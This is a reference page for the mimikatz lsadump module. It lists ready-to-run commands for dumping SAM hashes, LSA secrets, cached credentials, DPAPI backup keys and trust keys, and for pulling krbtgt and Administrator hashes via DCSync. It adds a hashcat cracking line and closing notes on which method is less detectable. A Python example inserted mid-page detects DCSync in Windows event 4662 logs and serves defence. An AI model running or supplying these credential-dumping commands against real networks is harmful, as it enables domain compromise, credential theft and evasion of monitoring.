lsadump

Dump credential databases from Windows systems: SAM, LSA secrets, cached credentials, DCSync, and more.

Prerequisites

Most commands require privilege::debug and/or token::elevate for SYSTEM-level access:

mimikatz # privilege::debug
mimikatz # token::elevate

sam — Dump SAM Database

Extract NTLM (and optionally LM) hashes from the Security Account Manager.

Online Mode (requires SYSTEM)

mimikatz # lsadump::sam

Offline Mode (registry hives)

First, save hives:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

Then analyze offline:

mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

secrets — Dump LSA Secrets

Extract LSA secrets (service account passwords, machine account password, cached domain credentials, DPAPI backup key, etc.).

mimikatz # lsadump::secrets

Offline:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SECURITY SecurityBkup.hiv
mimikatz # lsadump::secrets /system:SystemBkup.hiv /security:SecurityBkup.hiv

cache — Dump Cached Domain Credentials (MSCache2)

Extract cached domain credentials (DCC2 hashes). Windows stores these so that domain users can still log on when no DC is reachable.

mimikatz # lsadump::cache

Crack with hashcat: hashcat -m 2100 hash.txt wordlist.txt (mode 2100 = MSCache2)

lsa — Query LSA Credential Store

Query domain user credentials directly from LSA.

mimikatz # lsadump::lsa [/patch] [/inject] [/id:<rid>] [/name:<username>]

Options

  • /patch — patch LSA to dump credentials from memory
  • /inject — inject into the LSA process for extraction
  • /id:<rid> — query a specific user by RID
  • /name:<username> — query a specific user by name

Output includes: NTLM hashes, AES256/AES128/DES keys, WDigest credentials.

dcsync — DCSync (DRSR Protocol)

Use the Directory Replication Service Remote Protocol (MS-DRSR) to request credential data from a DC, as if the caller were another DC performing replication. No code needs to run on the DC itself.

Required rights: Domain Admins, Enterprise Admins, or accounts with Replicating Directory Changes + Replicating Directory Changes All permissions.

mimikatz # lsadump::dcsync /user:<domain>\<username> [/domain:<domain>] [/dc:<dc-ip>] [/all] [/csv]

Options

  • /user:<domain>\<username> — target account to replicate (e.g. corp\krbtgt, corp\Administrator)
  • /domain:<domain> — target domain FQDN (auto-detected if omitted)
  • /dc:<dc-ip> — specific DC to replicate from (auto-detected if omitted)
  • /all — dump all accounts
  • /csv — output in CSV format

Examples

# Dump krbtgt hash (for golden ticket)
mimikatz # lsadump::dcsync /user:<domain>\krbtgt

# Dump Administrator
mimikatz # lsadump::dcsync /user:<domain>\Administrator

# Dump all accounts
mimikatz # lsadump::dcsync /all /domain:<domain>

# Dump from specific DC
mimikatz # lsadump::dcsync /user:<domain>\krbtgt /dc:<dc-ip>
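Because DCSync is a replication request rather than code on the DC, the place to catch it is the DC's Directory Service Access audit: event 4662 records which principal exercised the replication control access rights, and anything other than a DC machine account doing so is worth an alert. The following detection logic is an added example, not part of mimikatz or of this page; the GUIDs are the Active Directory control access rights for directory replication, while the key=value record format, the account names and the DC list are constructed for the example.

```python
"""Flag likely DCSync activity in Windows Security event 4662 records (added example)."""
import re

# Active Directory control access right GUIDs that grant directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate: DC machine accounts. Constructed here; in practice
# populate this set from the Domain Controllers OU.
KNOWN_DC_ACCOUNTS = {"CORP-DC01$", "CORP-DC02$"}

_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')          # Key=Value or Key="quoted value"
_GUID = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")       # {guid} tokens in Properties

def parse_event(line):
    """Parse one constructed 'Key=Value' record into a dict, quotes stripped."""
    return {k: v.strip('"') for k, v in _FIELD.findall(line)}

def replication_rights_requested(event):
    """Sorted names of replication rights present in the Properties field."""
    guids = (g.lower() for g in _GUID.findall(event.get("Properties", "")))
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)

def is_suspicious_dcsync(event, dc_accounts=KNOWN_DC_ACCOUNTS):
    """True when a non-DC principal successfully exercised a replication right."""
    if event.get("EventID") != "4662" or event.get("Keywords") != "AuditSuccess":
        return False
    if not replication_rights_requested(event):
        return False
    return event.get("SubjectUserName", "").upper() not in dc_accounts

def find_dcsync(lines, dc_accounts=KNOWN_DC_ACCOUNTS):
    """Return (subject, rights) for every suspicious record among the given lines."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious_dcsync(ev, dc_accounts):
            hits.append((ev["SubjectUserName"], replication_rights_requested(ev)))
    return hits

SAMPLE_LOG = [  # constructed records: normal DC replication, DCSync by a user, a non-replication access, a denied attempt
    'EventID=4662 Keywords=AuditSuccess SubjectUserName=CORP-DC02$ ObjectType=domainDNS Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 Keywords=AuditSuccess SubjectUserName=jsmith ObjectType=domainDNS Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
    'EventID=4662 Keywords=AuditSuccess SubjectUserName=jsmith ObjectType=user Properties="{deadbeef-0000-0000-0000-000000000001}"',
    'EventID=4662 Keywords=AuditFailure SubjectUserName=svc-backup ObjectType=domainDNS Properties="{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"',
]

if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_LOG):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Only the second record is flagged: the DC's own replication is expected, the third record exercises no replication right, and the fourth was denied rather than granted.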

trust — Dump Domain Trust Keys

Extract inter-domain trust keys.

mimikatz # lsadump::trust [/patch]

backupkeys — Dump DPAPI Domain Backup Key

Retrieve the domain DPAPI backup key (used to decrypt all user DPAPI blobs in the domain).

mimikatz # lsadump::backupkeys /system:<dc-fqdn> /export

netsync — NetSync

Replicate credentials using the NetLogon protocol (Netlogon replication / NTLM password sync).

mimikatz # lsadump::netsync /dc:<dc-ip> /user:<username> /ntlm:<nt-hash>

Notes

  • dcsync is the preferred method — it runs from a regular domain-joined workstation, executes no code on the DC and never touches LSASS
  • lsadump::lsa /patch touches LSASS and is more detectable
  • Cached credentials (MSCache2) are domain credentials hashed together with the username — NOT pass-the-hash usable
  • Trust keys from lsadump::trust can be used to forge inter-realm tickets